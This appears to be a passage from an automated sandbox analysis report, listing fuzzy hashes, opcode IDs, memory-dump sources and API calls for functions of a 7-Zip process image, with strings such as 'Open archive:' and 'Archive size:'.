                                                                                                                                        • Instruction ID: ba5adf7f22711bfd50ebe5b787d01b282355ece9f45fe04d144f92530cdc5c08
                                                                                                                                        • Opcode Fuzzy Hash: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                                                                                        • Instruction Fuzzy Hash: F911467732598592DB20DF26E94435D6330F795BA5F404221EF9E43BA9DF28C959C700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryfree$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3252411863-0
                                                                                                                                        • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                        • Instruction ID: 2dad0955432200fb8c17a00bcb1dffe4eb123ad96327b6c8201c6538d75d7d27
                                                                                                                                        • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                        • Instruction Fuzzy Hash: C101FC25724741C1D638DF22EA8C37D53659BCB7F0F584220DE5D837A5DF64C9AA8B01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                        • Instruction ID: 670e1507de2094dd512d788b9a47ad65f5762d1a43e111c955c3b3b36fd184bf
                                                                                                                                        • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                        • Instruction Fuzzy Hash: 71F0DA63276584C2CB19FE36E46162E5354ABC7F91F815462AF0E57712DE38C4ABCB04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                        • Instruction ID: eeff4ae954b8ef50df8982eb95c0225bbe82c64c3e8fbbe04c8fc789db9bb00e
                                                                                                                                        • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                        • Instruction Fuzzy Hash: 0FE0E262630484C1CB18AF67DCA202823A8AF95F887541051AB2E8B326CD20C8AA8B84
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 002825EC
                                                                                                                                        • fputs.MSVCRT ref: 00282636
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                        • String ID: Name$Size
                                                                                                                                        • API String ID: 2276422817-481755742
                                                                                                                                        • Opcode ID: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                        • Instruction ID: 61b0deca2e6f06cd85e75bb54254a294f3c723940b7acaaf6603d903a188912c
                                                                                                                                        • Opcode Fuzzy Hash: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                        • Instruction Fuzzy Hash: 4941E336235685E2DB2AEF35E4547DE2720F744B68FC85122AF5E42291DF78CA5ACB00
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028BDCD
                                                                                                                                        • fputs.MSVCRT ref: 0028BE0B
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$memset
                                                                                                                                        • String ID: : Removing files after including to archive$Removing
                                                                                                                                        • API String ID: 3543874852-1218467041
                                                                                                                                        • Opcode ID: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                        • Instruction ID: 6366b56e86b201fcfbd84029708e308e8db55498939dda664986c0f12e105cb0
                                                                                                                                        • Opcode Fuzzy Hash: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                        • Instruction Fuzzy Hash: 8131C666621A8196DF79EF31E4853DE6320E741748F889026DB9F461A1DF7CD4DEC700
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028C4FD
                                                                                                                                        • fputs.MSVCRT ref: 0028C50D
                                                                                                                                        • free.MSVCRT ref: 0028C553
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                        • String ID: :
                                                                                                                                        • API String ID: 2276422817-3653984579
                                                                                                                                        • Opcode ID: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                                                                                        • Instruction ID: 5108045572e91d05fdb3bf0ac0b10ca1901436029cd014a5c2754ed556cd506c
                                                                                                                                        • Opcode Fuzzy Hash: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                                                                                        • Instruction Fuzzy Hash: EF11B416361A4281DB2CFF26D85436D6320FB85BE4F984231EF2E43796DF38D4698B50
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028B8EB
                                                                                                                                        • free.MSVCRT ref: 0028B90A
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                        • String ID: ERROR: $WARNING:
                                                                                                                                        • API String ID: 2276422817-2114518728
                                                                                                                                        • Opcode ID: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                                                                                        • Instruction ID: 9ffe4b151f6ac6a13dc1692ce90814ca2b94bd385151eb074b6489eb93c3ae75
                                                                                                                                        • Opcode Fuzzy Hash: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                                                                                        • Instruction Fuzzy Hash: 56116612722A8181DA29EF23E8557AE6320A785BE4F484225FF6F07395DF2CC499C700
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeavefputs
                                                                                                                                        • String ID: ERROR:
                                                                                                                                        • API String ID: 4171338575-977468659
                                                                                                                                        • Opcode ID: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                        • Instruction ID: 1a667609a3903bdf0e7416640b483e44dbc7d682ef1b7847fe3c9217f0d43233
                                                                                                                                        • Opcode Fuzzy Hash: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                        • Instruction Fuzzy Hash: A611C43635298185DB09EF25EC187A82361FB85FA5F588232EE1E0B6D8CF388469C710
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028BC6C
                                                                                                                                        • free.MSVCRT ref: 0028BC78
                                                                                                                                          • Part of subcall function 0028B1C8: memset.MSVCRT ref: 0028B20D
                                                                                                                                          • Part of subcall function 0028B1C8: fputs.MSVCRT ref: 0028B232
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                        • String ID: Archive size: $Files read from disk
                                                                                                                                        • API String ID: 2276422817-3736835528
                                                                                                                                        • Opcode ID: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                                                                                        • Instruction ID: 1f975ce2275e202e76a58a6c648b88934c4862e42cc6bc0d54e433e0699f32b6
                                                                                                                                        • Opcode Fuzzy Hash: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                                                                                        • Instruction Fuzzy Hash: EC115E62224941D0CB24FF25D8A539D6730EBC47A8FC45222FA5E476B9DF28C69ACB00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: a$z
                                                                                                                                        • API String ID: 0-4151050625
                                                                                                                                        • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                        • Instruction ID: 9da5aae76dff1e696848bc1d25df08daed21b1199cd0514815fe8c575e9534d7
                                                                                                                                        • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                        • Instruction Fuzzy Hash: 6401AD36B3105AC1EB287B13A9543F8A652E705B91FED8133EE8A07310D11959F9E305
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                        • API String ID: 1646373207-1489217083
                                                                                                                                        • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                        • Instruction ID: 9c15bc88b8bb92ddb2507014f73598cba3f54c4798030702e61358d0eefb40fd
                                                                                                                                        • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                        • Instruction Fuzzy Hash: C6F0C23ABB1505C7DB38DF20F5883A863A0E788316F944435E64B46A64DB7CD9ACCF01
                                                                                                                                        APIs
                                                                                                                                        • fputs.MSVCRT ref: 0028BACF
                                                                                                                                        • fputs.MSVCRT ref: 0028BAFC
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 0024237E
                                                                                                                                          • Part of subcall function 00242320: fputs.MSVCRT ref: 002423B8
                                                                                                                                          • Part of subcall function 00242320: free.MSVCRT ref: 002423C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free
                                                                                                                                        • String ID: Open archive: $StdOut
                                                                                                                                        • API String ID: 3873070119-2401103298
                                                                                                                                        • Opcode ID: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                        • Instruction ID: b7b7a5d8af6f652265ed3f9c2a8808efef10613e9ac814ef3f11aa0ed1207197
                                                                                                                                        • Opcode Fuzzy Hash: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                                                                                                                        • Instruction Fuzzy Hash: DFF0FEA9722D8581DE459F26DA8936D5321FB44FD9F58D432DD0E4B358DF28C4AAC310
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$fputc
                                                                                                                                        • String ID: $:
                                                                                                                                        • API String ID: 1185151155-4041779174
                                                                                                                                        • Opcode ID: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                        • Instruction ID: faa29d7bd681ea83b473efe5f197879e3da7d7a0bd79ba239b4bef35987ed100
                                                                                                                                        • Opcode Fuzzy Hash: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                                                                                                                        • Instruction Fuzzy Hash: 61E06D9A704A8081CB159B26E95835D6721FB9AFCDF488162EE8E07719DE2CC158CB11
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                        • API String ID: 1646373207-2515562745
                                                                                                                                        • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                        • Instruction ID: 17dea8d84753767779b4ee58cd7ca898a7165257718db75793ed56f70fdaef93
                                                                                                                                        • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                        • Instruction Fuzzy Hash: 62E0BF28763B02D1EE45DF55FD9936423A1BB85714FD4443AC90E423A0EF3CD659C340
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 408039514-0
                                                                                                                                        • Opcode ID: 52443c9e97cab2648bfe20a00b234d824f6916236684fe8f445761897a8ffe54
                                                                                                                                        • Instruction ID: 0dd15c6615bc25d195fe5c2889fdd9274383aa386f8ec6a22620e7d5a7b7f2f6
                                                                                                                                        • Opcode Fuzzy Hash: 52443c9e97cab2648bfe20a00b234d824f6916236684fe8f445761897a8ffe54
                                                                                                                                        • Instruction Fuzzy Hash: 31817D32329A4182CB24DF26D55075D77B5F788BA4F548225EF9E43B68EF38C865CB40
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 40fbad34ad08ef53c38e7c584ed340a08fa71d7b6630121cf115936eb5b45bb1
                                                                                                                                        • Instruction ID: b63e24ebaaa2c9d8d9aaea425acb72ccf2823ba2335495437d9ecb962540b52c
                                                                                                                                        • Opcode Fuzzy Hash: 40fbad34ad08ef53c38e7c584ed340a08fa71d7b6630121cf115936eb5b45bb1
                                                                                                                                        • Instruction Fuzzy Hash: AD41152233568096CB24EE22D40026DA7A0FB85BE9F584251FF9D07B59DF38C5A9CB04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: 17f176de3729c8be7a1c50527e113245de63cfe2bd49509b156de21a827faa07
                                                                                                                                        • Instruction ID: ec9bda120b58e425d6e5e1117c59eb763956d38bcb18ef54c809992cffa8924d
                                                                                                                                        • Opcode Fuzzy Hash: 17f176de3729c8be7a1c50527e113245de63cfe2bd49509b156de21a827faa07
                                                                                                                                        • Instruction Fuzzy Hash: CA41D7272286C085C731EA25E44015FAFA1F3D6798F584119FBDE07B9AC7BEC0A9CB11
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ErrorLastmemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3561842085-0
                                                                                                                                        • Opcode ID: 8d484b6dc7b6ff05b5f858e4c4103a732a5dd80ab3f46942bce2c8f21b482957
                                                                                                                                        • Instruction ID: 7d844d3b1648ec592c1e642be47526a7b7b869cf835c4a42e071550be24e7225
                                                                                                                                        • Opcode Fuzzy Hash: 8d484b6dc7b6ff05b5f858e4c4103a732a5dd80ab3f46942bce2c8f21b482957
                                                                                                                                        • Instruction Fuzzy Hash: 0131B372238A41C2CB54DF24E45025E7374FB89BA4F945221FB9E477A9DF38C5A9CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
